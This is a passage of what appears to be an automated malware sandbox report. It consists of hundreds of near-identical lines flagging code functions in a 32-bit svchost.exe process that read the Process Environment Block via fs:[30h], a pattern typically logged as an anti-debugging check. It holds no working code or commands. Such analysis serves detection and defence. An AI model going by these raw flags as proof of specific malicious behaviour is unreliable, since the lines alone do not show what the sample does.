                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB05A7 mov eax, dword ptr fs:[00000030h]3_2_03BB05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E59C mov eax, dword ptr fs:[00000030h]3_2_03B6E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B32582 mov eax, dword ptr fs:[00000030h]3_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B32582 mov ecx, dword ptr fs:[00000030h]3_2_03B32582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B64588 mov eax, dword ptr fs:[00000030h]3_2_03B64588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E5E7 mov eax, dword ptr fs:[00000030h]3_2_03B5E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B325E0 mov eax, dword ptr fs:[00000030h]3_2_03B325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C5ED mov eax, dword ptr fs:[00000030h]3_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6C5ED mov eax, dword ptr fs:[00000030h]3_2_03B6C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B365D0 mov eax, dword ptr fs:[00000030h]3_2_03B365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A5D0 mov eax, dword ptr fs:[00000030h]3_2_03B6A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E5CF mov eax, dword ptr fs:[00000030h]3_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E5CF mov eax, dword ptr fs:[00000030h]3_2_03B6E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40535 mov eax, dword ptr fs:[00000030h]3_2_03B40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E53E mov eax, dword ptr fs:[00000030h]3_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E53E mov eax, dword ptr fs:[00000030h]3_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E53E mov eax, dword ptr fs:[00000030h]3_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E53E mov eax, dword ptr fs:[00000030h]3_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5E53E mov eax, dword ptr fs:[00000030h]3_2_03B5E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6500 mov eax, dword ptr fs:[00000030h]3_2_03BC6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04500 mov eax, dword ptr fs:[00000030h]3_2_03C04500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6656A mov eax, dword ptr fs:[00000030h]3_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6656A mov eax, dword ptr fs:[00000030h]3_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6656A mov eax, dword ptr fs:[00000030h]3_2_03B6656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38550 mov eax, dword ptr fs:[00000030h]3_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38550 mov eax, dword ptr fs:[00000030h]3_2_03B38550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B644B0 mov ecx, dword ptr fs:[00000030h]3_2_03B644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]3_2_03BBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B364AB mov eax, dword ptr fs:[00000030h]3_2_03B364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA49A mov eax, dword ptr fs:[00000030h]3_2_03BEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B304E5 mov ecx, dword ptr fs:[00000030h]3_2_03B304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6A430 mov eax, dword ptr fs:[00000030h]3_2_03B6A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E420 mov eax, dword ptr fs:[00000030h]3_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E420 mov eax, dword ptr fs:[00000030h]3_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2E420 mov eax, dword ptr fs:[00000030h]3_2_03B2E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2C427 mov eax, dword ptr fs:[00000030h]3_2_03B2C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB6420 mov eax, dword ptr fs:[00000030h]3_2_03BB6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68402 mov eax, dword ptr fs:[00000030h]3_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68402 mov eax, dword ptr fs:[00000030h]3_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68402 mov eax, dword ptr fs:[00000030h]3_2_03B68402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5A470 mov eax, dword ptr fs:[00000030h]3_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5A470 mov eax, dword ptr fs:[00000030h]3_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5A470 mov eax, dword ptr fs:[00000030h]3_2_03B5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC460 mov ecx, dword ptr fs:[00000030h]3_2_03BBC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BEA456 mov eax, dword ptr fs:[00000030h]3_2_03BEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2645D mov eax, dword ptr fs:[00000030h]3_2_03B2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5245A mov eax, dword ptr fs:[00000030h]3_2_03B5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6E443 mov eax, dword ptr fs:[00000030h]3_2_03B6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40BBE mov eax, dword ptr fs:[00000030h]3_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40BBE mov eax, dword ptr fs:[00000030h]3_2_03B40BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]3_2_03BE4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38BF0 mov eax, dword ptr fs:[00000030h]3_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38BF0 mov eax, dword ptr fs:[00000030h]3_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38BF0 mov eax, dword ptr fs:[00000030h]3_2_03B38BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EBFC mov eax, dword ptr fs:[00000030h]3_2_03B5EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]3_2_03BBCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]3_2_03BDEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B50BCB mov eax, dword ptr fs:[00000030h]3_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B50BCB mov eax, dword ptr fs:[00000030h]3_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B50BCB mov eax, dword ptr fs:[00000030h]3_2_03B50BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30BCD mov eax, dword ptr fs:[00000030h]3_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30BCD mov eax, dword ptr fs:[00000030h]3_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30BCD mov eax, dword ptr fs:[00000030h]3_2_03B30BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EB20 mov eax, dword ptr fs:[00000030h]3_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EB20 mov eax, dword ptr fs:[00000030h]3_2_03B5EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF8B28 mov eax, dword ptr fs:[00000030h]3_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BF8B28 mov eax, dword ptr fs:[00000030h]3_2_03BF8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C02B57 mov eax, dword ptr fs:[00000030h]3_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C02B57 mov eax, dword ptr fs:[00000030h]3_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C02B57 mov eax, dword ptr fs:[00000030h]3_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C02B57 mov eax, dword ptr fs:[00000030h]3_2_03C02B57
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAEB1D mov eax, dword ptr fs:[00000030h]3_2_03BAEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04B00 mov eax, dword ptr fs:[00000030h]3_2_03C04B00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B2CB7E mov eax, dword ptr fs:[00000030h]3_2_03B2CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28B50 mov eax, dword ptr fs:[00000030h]3_2_03B28B50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEB50 mov eax, dword ptr fs:[00000030h]3_2_03BDEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4B4B mov eax, dword ptr fs:[00000030h]3_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BE4B4B mov eax, dword ptr fs:[00000030h]3_2_03BE4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6B40 mov eax, dword ptr fs:[00000030h]3_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC6B40 mov eax, dword ptr fs:[00000030h]3_2_03BC6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFAB40 mov eax, dword ptr fs:[00000030h]3_2_03BFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD8B42 mov eax, dword ptr fs:[00000030h]3_2_03BD8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38AA0 mov eax, dword ptr fs:[00000030h]3_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B38AA0 mov eax, dword ptr fs:[00000030h]3_2_03B38AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86AA4 mov eax, dword ptr fs:[00000030h]3_2_03B86AA4
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B68A90 mov edx, dword ptr fs:[00000030h]3_2_03B68A90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3EA80 mov eax, dword ptr fs:[00000030h]3_2_03B3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04A80 mov eax, dword ptr fs:[00000030h]3_2_03C04A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6AAEE mov eax, dword ptr fs:[00000030h]3_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6AAEE mov eax, dword ptr fs:[00000030h]3_2_03B6AAEE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30AD0 mov eax, dword ptr fs:[00000030h]3_2_03B30AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B64AD0 mov eax, dword ptr fs:[00000030h]3_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B64AD0 mov eax, dword ptr fs:[00000030h]3_2_03B64AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B86ACC mov eax, dword ptr fs:[00000030h]3_2_03B86ACC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B54A35 mov eax, dword ptr fs:[00000030h]3_2_03B54A35
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA38 mov eax, dword ptr fs:[00000030h]3_2_03B6CA38
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA24 mov eax, dword ptr fs:[00000030h]3_2_03B6CA24
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B5EA2E mov eax, dword ptr fs:[00000030h]3_2_03B5EA2E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBCA11 mov eax, dword ptr fs:[00000030h]3_2_03BBCA11
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BACA72 mov eax, dword ptr fs:[00000030h]3_2_03BACA72
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B6CA6F mov eax, dword ptr fs:[00000030h]3_2_03B6CA6F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BDEA60 mov eax, dword ptr fs:[00000030h]3_2_03BDEA60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B36A50 mov eax, dword ptr fs:[00000030h]3_2_03B36A50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B40A5B mov eax, dword ptr fs:[00000030h]3_2_03B40A5B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov esi, dword ptr fs:[00000030h]3_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB89B3 mov eax, dword ptr fs:[00000030h]3_2_03BB89B3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B429A0 mov eax, dword ptr fs:[00000030h]3_2_03B429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B309AD mov eax, dword ptr fs:[00000030h]3_2_03B309AD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B629F9 mov eax, dword ptr fs:[00000030h]3_2_03B629F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]3_2_03BBE9E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]3_2_03B3A9D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B649D0 mov eax, dword ptr fs:[00000030h]3_2_03B649D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]3_2_03BFA9D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC69C0 mov eax, dword ptr fs:[00000030h]3_2_03BC69C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C04940 mov eax, dword ptr fs:[00000030h]3_2_03C04940
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB892A mov eax, dword ptr fs:[00000030h]3_2_03BB892A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BC892B mov eax, dword ptr fs:[00000030h]3_2_03BC892B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC912 mov eax, dword ptr fs:[00000030h]3_2_03BBC912
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B28918 mov eax, dword ptr fs:[00000030h]3_2_03B28918
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BAE908 mov eax, dword ptr fs:[00000030h]3_2_03BAE908
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BD4978 mov eax, dword ptr fs:[00000030h]3_2_03BD4978
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC97C mov eax, dword ptr fs:[00000030h]3_2_03BBC97C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B56962 mov eax, dword ptr fs:[00000030h]3_2_03B56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov edx, dword ptr fs:[00000030h]3_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B7096E mov eax, dword ptr fs:[00000030h]3_2_03B7096E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BB0946 mov eax, dword ptr fs:[00000030h]3_2_03BB0946
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03C008C0 mov eax, dword ptr fs:[00000030h]3_2_03C008C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03BBC89D mov eax, dword ptr fs:[00000030h]3_2_03BBC89D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03B30887 mov eax, dword ptr fs:[00000030h]3_2_03B30887
